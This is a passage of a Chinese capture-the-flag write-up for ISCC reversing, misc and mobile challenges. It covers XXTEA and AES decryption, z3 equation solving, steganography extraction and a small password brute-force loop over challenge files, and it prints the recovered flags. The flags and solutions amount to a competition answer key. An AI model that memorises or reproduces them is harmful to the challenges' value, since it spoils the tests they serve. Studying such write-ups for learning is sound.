} while (--rounds);
}
void testDecode() {
uint32_t key[] = {73, 83, 67, 67};
int v[] = {0x4032B60D, 0x89D521BE, 0x90361747, 0x3DA2447B, 0x2B2D3109, 0xAA937352, 0xE77FB14B, 0xDBFC42C2,
0x9293B927, 0xC1CB1B76, 0xD105288B, 0x4F0005A8, 0x18F3886, 0x413CD540, 0xE8EFE503, 0x9F895C25,
0xB67753B5, 0x1FA5F1D7};
btea(v, -18, key);
for (int i = 0; i < 32; i++) {
printf("%c", v[i]);
}
printf("\n");
}
int main() {
testDecode();
}
Sad Code
看起来是个解方程。先解。得到全是字母。还有{} 看起来是flag。
不过。顺序不太对。有CCSI那么应该是小端存储了。转一下出结果。
from z3 import *
v14 = [Int("v14[%d]" % i) for i in range(8)]
print(v14)
s = Solver()
s.add(v14[2] + 7 * v14[1] - 4 * v14[0] - 2 * v14[3] == 0x1F5EA8C00)
s.add(5 * v14[3] + 3 * v14[2] - v14[1] - 2 * v14[0] == 0x108F6E368)
s.add(2 * v14[1] + 8 * v14[3] + 10 * v14[0] - 5 * v14[2] == 0x4A18F441B)
s.add(7 * v14[0] + 15 * v14[1] - 3 * v14[3] - 2 * v14[2] == 0x7ECCF5666)
s.add(15 * v14[4] + 35 * v14[7] - v14[5] - v14[6] == 0xF42A66869)
s.add(38 * v14[6] + v14[4] + v14[7] - 24 * v14[5] == 0x5F365BBC4)
s.add(38 * v14[5] + 32 * v14[4] - v14[6] - v14[7] == 0x16E025FD77)
s.add(v14[4] + 41 * v14[6] - v14[5] - 25 * v14[7] == 0x685C19B67)
print(s.check())
print(s.model())
解出来值是小端的。打印时调一下。
from Crypto.Util.number import long_to_bytes
v14 = [1230193475, 2068924245, 1113150537, 1127044936, 1497714515, 1397828937, 1481460802, 1313036669]
for c in v14:
print(long_to_bytes(c).decode(),end='')
mobile
mobilea
jadx打开。分析。有encode类和一些加密方式 。
分成两段。
第一部分
key:K@e2022%%y
iv:I&V2022***
key_base64: S0BlMjAyMiUleQ==
iv_base64:SSZWMjAyMioqKg==
enc:H9d6jjl5dzzLNpHH3KTIQZBeWCP5UnGLQFrvIU42ObY=
解码得到: asd;'.,klpoio1ASd_
第二部分 _ 后面的内容通过 encode函数加密。
1.Jlast变换输入后为 =1eNR5g=A9wyfpi2814H07pL
1.输入值转MD5
2.md5经过encode变换后后长度为24.
3.一些运算cArrEncode。
解码
1.逆向获得encode的值为 0HfyRN74pw5ep1i9g1L82A==
2.看一个encode是怎么进行变换的。看起来是base64
encode字符串后进行了些操作。逆回去。
0HfyRN74pw5ep1i9g1L82A==
base64解码。转成hex为d077f244def8a70e5ea758bd8352fcd8,然后用 https://www.somd5.com/ 查一下得到cat
组合一下得到flag
ISCC{asd;'.,klpoio1ASd_cat}
擂台赛
Misc
666
1.zip伪密码去掉
2.steghide 弱密码解码 得到 high.png
steghide extract -p 123456 -sf src_sec.jpg
3.png修改高得到密码 !@#$%678()_+
4.解压flag.rar在流量包找到
https://www.cnblogs.com/konglingdi/p/14998301.html 得到动图
图片中有三段加密。
第一个:SE1ERWtleTo4NTIgOTg3NDU2MzIxIDk4NDIzIDk4NDIzIFJFQUxrZXk6eFN4eA== 解得ISCC
第二个:pQLKpP/
第三个:EPmw301eZRzuYvQ==
解aes.ecb 用ISCC当密钥
pQLKpP/EPmw301eZRzuYvQ==
得到 bwmeiyoukaig
弱雪
时间戳隐写
from pathlib import Path
from natsort import natsorted
f = open('outfile.txt', 'w+')
for file in natsorted(Path('snow').glob('**/*.txt'), key=lambda x:x.name):
ctime = file.stat().st_ctime
if (int(ctime) < 1651438000):
f.write('0')
else:
f.write('1')
转换一下。保存7z。然后是snow隐写。需要爆破一下。
import os
lines = open('pwd.txt', 'r').read().splitlines()
for line in lines:
os.system(f'snow -C -p {line} snow.txt >> res.txt')
flag{P6pbgN53q7l5D/ffTY2jH3uJVTQ7}
Re
Encode
这段是交换,相当于 a,b = b,a
data[i_0] ^= data[len - i_0 - 1];
data[len - i_0 - 1] ^= data[i_0];
data[i_0] ^= data[len - i_0 - 1];
import gmpy2
enc = [0x23, 0x4A, 0x07, 0x2B, 0x1D, 0x06, 0x3F, 0x36, 0x36, 0x2B, 0x05, 0x07, 0x06, 0x39, 0x02, 0x06, 0x38, 0x21, 0x4B, 0x1A, 0x2D, 0x2D, 0x39, 0x02]
key = [7, 0xb, 0xd, 0]
key[3] = key[1] * key[0]
length = len(enc)
def get_phi(n):
pn = gmpy2.isqrt(n)
p = gmpy2.next_prime(pn)
q = n // p
assert p * q == n
return (p - 1) * (q - 1)
for i in range(length):
d = gmpy2.invert(key[2], get_phi(key[3]))
enc[i] = pow(enc[i], d, key[3])
for i in range(length):
enc[i] += 70
enc[i] ^= 0x3f
for i in range(length // 2):
enc[i], enc[length - 1 - i] = enc[length - 1 - i], enc[i]
for i in range(length):
enc[i] ^= 0xf
for c in enc:
print(chr(c), end='')
# ISCC{PWN_IS_REALLY_HARD}
Mobile
Mobile_Analysis
1.线性码表变换
def generate(n=18):
for i in range(n):
print(chr(i + 0x31), end='')
print()
def get_trans_table(a, b):
lst = []
for i in range(len(a)):
origin = i
c = a[i]
after = b.index(c)
lst.append((origin, after))
return lst
def translate(tab, value):
f = ''
for i_origin, i_after in tab:
f += value[i_after]
return f
if __name__ == '__main__':
da = "123456789:;<=>?0"
db = "=>?789:;<0123456"
tab = get_trans_table(da, db)
print(tab)
plain = translate(tab, "bGFtkaXNwjSVNDQ3")
print(plain)
# SVNDQ3tkaXNwbGFj
# ISCC{displac
SVNDQ3tkaXNwbGFj
key: J0tpzHRuhTQpLauS
iv: qws871bz73msl9x8
("AES/CBC/PKCS5Padding");
resb64: ("unj2Cn3dS9Ya1LDFPlA+eA==");
解密得 otG28PYN8CtG
a: J0tpzHRuhTQpLauS
b: otG28PYN8CtG
a.a解密
a = "J0tpzHRuhTQpLauS"
t = "cdeEFGfghijkKLHIJNO9/PQYqrsMnoRSTablBCDtZ012UVWXpyzA345umvwx678="
for c in a:
i = t.index(c)
for j in range(64):
a, b = divmod(i + j * 64 - 8, 5)
if b == 0:
# print(a,b,j )
print(t[a], end='')
break
# ZV9hbHRlcm5hdGl2
# e_alternativ
a.b
a = "otG28PYN8CtG"
t = "cdYqrsMneEFwxg78=GfKlLHRSTabBCDtZ012UhiQok6VWmXpjIJNO9/PyzA345uv"
for c in a:
i = t.index(c)
for j in range(64):
a, b = divmod(i + j * 64 - 8, 5)
if b == 0:
# print(a,b,j )
print(t[a], end='')
break
# ZV9tb2JpbGV9
# e_mobile}
